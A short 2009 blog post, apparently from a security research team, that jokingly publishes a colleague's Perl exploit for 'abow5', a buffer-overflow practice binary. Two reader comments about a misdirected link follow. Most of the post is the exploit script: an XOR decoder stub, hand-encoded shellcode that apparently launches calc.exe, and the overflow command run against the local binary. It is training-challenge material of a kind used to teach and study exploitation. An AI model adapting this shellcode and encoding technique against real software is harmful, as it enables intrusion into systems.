Wednesday, January 14, 2009

Preventing Shong from getting her CISSP

This is Shong's exploit for abow5 (the special one that owns you back if you're using ollydbg). Now she has released a weaponized exploit, and cannot pass the CISSP ethics requirements. I've done the world a vast good.
 
 

================== exploit.pl ==================

$decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" .
"\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff";

$shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

$key = "\x90" x 121;
$endof_shellcode = "\x4f\x4c\x4c\x41"; 
$shellcode = $shellcode ^ $key; 
$prefix = "A" x 37;
$postfix = "A " x 0x1326;
$abow5 = "c:/cygwin/home/Administrator/abow5/abow5.exe";
$param = "ABCD" x 256 . "\x7f"; 
$shell_param = $decoder . $shellcode . $endof_shellcode;
 
`echo $param | exec $abow5 1025$prefix '$shell_param' $postfix`;

2 comments:

j said...

in:
http://www.snort.org/vrt/tools/awbo.html

the link that's supposed to point to "Test 3, Awbo4.exe" is actually pointing to "Test 2, awbo4.exe"

Nigel Houghton said...

Apologies, we'll get that fixed. Thanks.